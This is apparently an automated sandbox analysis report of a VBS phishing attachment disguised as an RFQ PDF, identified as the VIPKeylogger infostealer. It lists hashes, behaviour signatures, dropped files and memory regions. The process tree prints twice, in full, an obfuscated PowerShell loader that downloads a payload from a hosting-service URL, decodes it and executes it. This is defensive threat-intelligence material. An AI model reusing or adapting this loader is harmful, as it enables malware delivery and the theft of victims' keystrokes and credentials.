Analysis

  • max time kernel
    35s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-10-2024 06:41

General

  • Target

    RFQ_64182MR_PDF.R00.vbs

  • Size

    525KB

  • MD5

    63a5b7d958f537744c5330b3fef8ccac

  • SHA1

    00ba79f887c403afabdd6ffe21db30e82288f84b

  • SHA256

    ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286

  • SHA512

    3e7dd82783ffc59320bcdef7942d9b2e7de31cb40dd1c7597d5b17895e6c695888b4791b8191f80aedc0f1fe053d05785681844cf1c1cb0d16158411bffd7909

  • SSDEEP

    6144:Zf/7gXsuuCdsOQpE4V+iZeCKnoQLirdqJGfimOWIVV8T6Oj+WqXZQRhmxCDf2Nzv:u66sOQ66MfiZqbm3eVpZxxCTagc7og

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2896
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:2200

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEWQANB74JC5JAIXK3PO.temp

    Filesize

    7KB

    MD5

    d0a1b6f8c101524394750e499ab57ab4

    SHA1

    d76539a75d684d909358551bc0166f9fd0dc8e4a

    SHA256

    e8b790bea3d144883ec5b0fdf38a397e81a303fca748a97c6a776c0525210a4c

    SHA512

    8c2f3e896d6f423cfb102fe985b2eeaf2986f67a52830b59ac7f73414acb20b2e16e122ca306f9956af8d597cf5e6e6ad229c43d346e3dd781cb9138ae2dc78c

  • C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End

    Filesize

    440KB

    MD5

    6771cd798c1df9b5eddc60071dfc6e15

    SHA1

    65e923600e1c2604d90a481d257dc99c23fbf1dd

    SHA256

    0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f

    SHA512

    cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee

  • memory/2144-20-0x0000000006780000-0x000000000B708000-memory.dmp

    Filesize

    79.5MB

  • memory/2200-44-0x0000000000740000-0x0000000000788000-memory.dmp

    Filesize

    288KB

  • memory/2200-43-0x0000000000740000-0x00000000017A2000-memory.dmp

    Filesize

    16.4MB

  • memory/2200-42-0x0000000000740000-0x00000000017A2000-memory.dmp

    Filesize

    16.4MB

  • memory/2896-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

    Filesize

    4KB

  • memory/2896-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

    Filesize

    4KB

  • memory/2896-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize

    32KB

  • memory/2896-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB